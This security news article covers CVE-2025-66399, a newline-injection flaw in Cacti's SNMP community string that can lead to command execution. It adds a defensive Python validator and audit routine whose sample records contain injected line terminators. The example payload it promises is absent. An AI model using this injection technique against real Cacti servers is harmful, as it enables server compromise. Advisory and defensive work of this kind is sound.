A high-severity security flaw has been uncovered in Cacti, the popular open-source network graphing solution. The vulnerability, tracked as CVE-2025-66399, exposes Cacti installations to Remote Code Execution (RCE), potentially allowing attackers to seize full control of the monitoring server.
The core of the problem lies in how Cacti handles the SNMP Community String—a credential used to query network devices. When an administrator or a user with device-edit permissions saves a device, the application fails to scrub the input for dangerous characters.
The advisory explicitly notes an “input-validation flaw in the SNMP device configuration functionality.” Specifically, the code responsible for validating the community string (snmp_community) is missing a critical filter. The regex used for sanitization “is intentionally left empty (''), disabling validation.”
This oversight means that “newline characters remain unmodified.”
Because the system doesn’t strip these characters, an attacker can inject malicious commands that the backend system interprets as separate instructions.
“An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations.”
When Cacti attempts to poll the device using downstream tools (like snmpwalk or wrappers), the injected newline breaks the command structure. “In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process.”
The advisory provides a clear example of how a “crafted multi-line community string” is stored. An attacker can inject a payload such as:
As a result, arbitrary commands may execute with the privileges of the Cacti process.
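As an added illustration (not code from the advisory or from Cacti itself), the following Python shows the check the article says is missing: a validator that rejects any ASCII control character in a community string, plus an audit routine that applies the same rule to already-stored device records so an administrator can spot values that were saved before patching. The length limit, the record layout and the sample rows are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Any ASCII control character (0x00-0x1F, 0x7F) is illegal in a community
# string; this range covers CR, LF, NUL and tab, so a multi-line value is caught.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
MAX_COMMUNITY_LEN = 255  # assumed local policy limit, not a value from the advisory


def validate_community(value: str) -> tuple[bool, str]:
    """Return (ok, reason). Rejects rather than silently stripping, so the
    operator learns that an unexpected value was submitted."""
    if not value:
        return False, "empty"
    if len(value) > MAX_COMMUNITY_LEN:
        return False, "too long"
    m = CONTROL_CHARS.search(value)
    if m:
        return False, f"control character 0x{ord(m.group()):02x} at offset {m.start()}"
    return True, "ok"


@dataclass
class Host:
    """Constructed stand-in for a row of Cacti's device (host) table."""
    id: int
    hostname: str
    snmp_community: str


def find_suspicious_hosts(hosts: list[Host]) -> list[tuple[int, str, str]]:
    """Audit stored records for community strings the validator would reject.
    Returns (id, hostname, reason) for each offending record."""
    findings = []
    for h in hosts:
        ok, reason = validate_community(h.snmp_community)
        if not ok:
            findings.append((h.id, h.hostname, reason))
    return findings


# Constructed sample records; rows 3 and 4 carry smuggled line terminators.
SAMPLE_HOSTS = [
    Host(1, "core-sw1", "public"),
    Host(2, "edge-rtr2", "m0n1tor-r0"),
    Host(3, "lab-box", "public\nextra-token"),
    Host(4, "printer", "private\rtail"),
]

if __name__ == "__main__":
    for host_id, name, reason in find_suspicious_hosts(SAMPLE_HOSTS):
        print(f"host {host_id} ({name}): {reason}")
```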
The consequences of this vulnerability are severe. Successful exploitation can lead to:
- Unauthorized modification of monitoring data
- Execution of system-level commands
- Unauthorized file writes
- Potential full compromise of the Cacti server
The development team has released a patch to address this flaw. Administrators are urged to upgrade immediately to version 1.2.29.